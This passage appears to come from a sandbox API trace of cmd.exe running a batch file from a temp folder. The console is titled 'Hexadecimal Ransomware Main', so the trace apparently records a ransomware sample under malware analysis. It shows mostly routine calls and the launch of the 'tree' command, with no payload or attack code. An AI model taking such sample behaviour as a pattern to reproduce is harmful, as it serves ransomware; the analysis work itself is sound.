dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0103.806] GetProcessHeap () returned 0x1dc256b0000 [0103.806] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256b1640 [0103.806] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0103.806] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0103.806] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0103.806] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0103.806] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.806] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0103.807] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0103.808] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0103.808] GetProcessHeap () returned 0x1dc256b0000 [0103.808] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b1640) returned 1 [0103.808] GetProcessHeap () returned 0x1dc256b0000 [0103.808] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x12) returned 0x1dc256b9000 [0103.808] lstrcmpW (lpString1="\\tree.com", lpString2="\\XCOPY.EXE") returned -1 [0103.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.808] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0103.810] _get_osfhandle (_FileHandle=0) returned 0x4c [0103.810] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0103.816] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\tree.com", lpCommandLine="tree", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x407419e650*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tree", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x407419e628 | out: lpCommandLine="tree", lpProcessInformation=0x407419e628*(hProcess=0x9c, hThread=0xa0, dwProcessId=0x1a0, dwThreadId=0x258)) returned 1 [0103.830] CloseHandle (hObject=0xa0) returned 1 [0103.830] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0103.830] GetProcessHeap () returned 0x1dc256b0000 [0103.830] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0103.830] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0103.830] GetProcessHeap () returned 0x1dc256b0000 [0103.830] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0103.830] FreeEnvironmentStringsA (penv="=") returned 1 [0103.830] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0104.850] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x407419e5a8 | out: lpExitCode=0x407419e5a8*=0x0) returned 1 [0104.850] CloseHandle (hObject=0x9c) returned 1 [0104.851] _vsnwprintf (in: _Buffer=0x407419e778, _BufferCount=0x13, _Format="%08X", _ArgList=0x407419e5b8 | out: _Buffer="00000000") returned 8 [0104.851] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0104.851] GetProcessHeap () returned 0x1dc256b0000 [0104.851] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0104.851] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0104.851] GetProcessHeap () returned 0x1dc256b0000 [0104.851] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0104.851] FreeEnvironmentStringsA (penv="=") returned 1 [0104.851] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0104.851] GetProcessHeap () returned 0x1dc256b0000 [0104.851] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0104.851] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0104.851] GetProcessHeap () returned 0x1dc256b0000 [0104.851] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0104.851] FreeEnvironmentStringsA (penv="=") returned 1 [0104.851] GetProcessHeap () returned 0x1dc256b0000 [0104.851] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9000) returned 1 [0104.851] DeleteProcThreadAttributeList (in: lpAttributeList=0x407419e730 | out: lpAttributeList=0x407419e730) [0104.851] ??_V@YAXPEAX@Z () returned 0x1 [0104.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.853] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0104.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.854] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0104.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.867] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0104.881] _get_osfhandle (_FileHandle=0) returned 0x4c [0104.881] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0104.882] _get_osfhandle (_FileHandle=0) returned 0x4c [0104.882] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0104.883] SetConsoleInputExeNameW () returned 0x1 [0104.883] GetConsoleOutputCP () returned 0x1b5 [0104.885] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0104.885] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.886] ??_V@YAXPEAX@Z () returned 0x1 [0104.887] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0104.888] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0104.888] _get_osfhandle (_FileHandle=3) returned 0x9c [0104.888] SetFilePointer (in: hFile=0x9c, lDistanceToMove=69, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x45 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bca10) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc840) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bdbb0) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256e8710) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb60) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d8720) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcf80) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc670) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.888] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc4a0) returned 1 [0104.888] GetProcessHeap () returned 0x1dc256b0000 [0104.889] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0104.889] GetProcessHeap () returned 0x1dc256b0000 [0104.889] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0104.889] GetProcessHeap () returned 0x1dc256b0000 [0104.889] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0104.890] _get_osfhandle (_FileHandle=3) returned 0x9c [0104.890] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x45 [0104.890] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x1a4, lpOverlapped=0x0) returned 1 [0104.891] SetFilePointer (in: hFile=0x9c, lDistanceToMove=75, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4b [0104.891] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=6, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="tree\r\nHexadecimal Ransomware Main\r\n") returned 6 [0104.891] _get_osfhandle (_FileHandle=3) returned 0x9c [0104.891] GetFileType (hFile=0x9c) returned 0x1 [0104.891] _get_osfhandle (_FileHandle=3) returned 0x9c [0104.891] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4b [0104.891] GetProcessHeap () returned 0x1dc256b0000 [0104.891] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256c0860 [0104.891] GetProcessHeap () returned 0x1dc256b0000 [0104.891] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0860) returned 1 [0104.891] _wcsicmp (_String1="tree", _String2=")") returned 75 [0104.891] _wcsicmp (_String1="FOR", _String2="tree") returned -14 [0104.892] _wcsicmp (_String1="FOR/?", _String2="tree") returned -14 [0104.892] _wcsicmp (_String1="IF", _String2="tree") returned -11 [0104.892] _wcsicmp (_String1="IF/?", _String2="tree") returned -11 [0104.892] _wcsicmp (_String1="REM", _String2="tree") returned -2 [0104.892] _wcsicmp (_String1="REM/?", _String2="tree") returned -2 [0104.892] GetProcessHeap () returned 0x1dc256b0000 [0104.892] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0104.892] GetProcessHeap () returned 0x1dc256b0000 [0104.892] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b9920 [0104.892] _tell (_FileHandle=3) returned 75 [0104.892] _close (_FileHandle=3) returned 0 [0104.892] malloc (_Size=0xffce) returned 0x1dc257e0160 [0104.893] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0104.894] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0104.894] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0104.894] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0104.894] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0104.894] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0104.894] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0104.894] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0104.894] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0104.894] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0104.894] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0104.894] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0104.894] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0104.894] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0104.894] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0104.894] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0104.894] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0104.894] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0104.894] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0104.894] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0104.894] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0104.894] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0104.894] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0104.894] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0104.894] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0104.894] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0104.894] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0104.894] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0104.894] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0104.894] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0104.894] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0104.894] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0104.894] _wcsicmp (_String1="tree", _String2="START") returned 1 [0104.895] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0104.895] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0104.895] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0104.895] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0104.895] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0104.895] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0104.895] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0104.895] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0104.895] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0104.895] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0104.895] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0104.895] malloc (_Size=0xffce) returned 0x1dc257f0140 [0104.895] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0104.895] GetProcessHeap () returned 0x1dc256b0000 [0104.896] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256d86c0 [0104.898] SetErrorMode (uMode=0x0) returned 0x0 [0104.898] SetErrorMode (uMode=0x1) returned 0x0 [0104.898] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256d86d0, lpFilePart=0x407419ecc0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419ecc0*="Desktop") returned 0x17 [0104.898] SetErrorMode (uMode=0x0) returned 0x1 [0104.898] GetProcessHeap () returned 0x1dc256b0000 [0104.898] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256d86c0, Size=0x4a) returned 0x1dc256d86c0 [0104.898] GetProcessHeap () returned 0x1dc256b0000 [0104.898] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256d86c0) returned 0x4a [0104.898] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0104.898] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.898] GetProcessHeap () returned 0x1dc256b0000 [0104.898] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd470 [0104.898] GetProcessHeap () returned 0x1dc256b0000 [0104.898] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256be260 [0104.898] GetProcessHeap () returned 0x1dc256b0000 [0104.898] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be260, Size=0x1be) returned 0x1dc256be260 [0104.898] GetProcessHeap () returned 0x1dc256b0000 [0104.899] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be260) returned 0x1be [0104.899] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.899] GetProcessHeap () returned 0x1dc256b0000 [0104.899] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256bcf80 [0104.899] GetProcessHeap () returned 0x1dc256b0000 [0104.899] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcf80, Size=0x7e) returned 0x1dc256bcf80 [0104.899] GetProcessHeap () returned 0x1dc256b0000 [0104.899] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcf80) returned 0x7e [0104.899] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.899] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0104.899] GetLastError () returned 0x2 [0104.899] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.899] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0104.900] GetLastError () returned 0x2 [0104.900] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.900] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256beea0 [0104.900] FindClose (in: hFindFile=0x1dc256beea0 | out: hFindFile=0x1dc256beea0) returned 1 [0104.900] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256becc0 [0104.900] FindClose (in: hFindFile=0x1dc256becc0 | out: hFindFile=0x1dc256becc0) returned 1 [0104.900] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0104.900] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0104.900] ??_V@YAXPEAX@Z () returned 0x1 [0104.900] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0104.902] malloc (_Size=0xffce) returned 0x1dc257f0140 [0104.902] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0104.902] malloc (_Size=0xffce) returned 0x1dc25800120 [0104.902] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0104.903] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0104.903] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0104.903] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0104.903] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0104.903] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0104.903] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0104.903] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0104.903] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0104.903] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0104.903] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0104.903] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0104.903] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0104.903] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0104.903] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0104.903] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0104.903] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0104.903] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0104.903] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0104.903] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0104.904] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0104.904] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0104.904] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0104.904] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0104.904] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0104.904] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0104.904] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0104.904] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0104.904] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0104.904] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0104.904] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0104.904] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0104.904] _wcsicmp (_String1="tree", _String2="START") returned 1 [0104.904] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0104.904] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0104.904] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0104.904] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0104.904] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0104.904] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0104.904] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0104.904] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0104.904] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0104.904] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0104.904] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0104.904] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0104.904] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0104.904] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0104.904] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0104.904] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0104.904] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0104.904] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0104.905] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0104.905] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0104.905] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0104.905] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0104.905] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0104.905] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0104.905] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0104.905] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0104.905] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0104.905] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0104.905] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0104.905] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0104.905] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0104.905] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0104.905] _wcsicmp (_String1="tree", _String2="CLS") 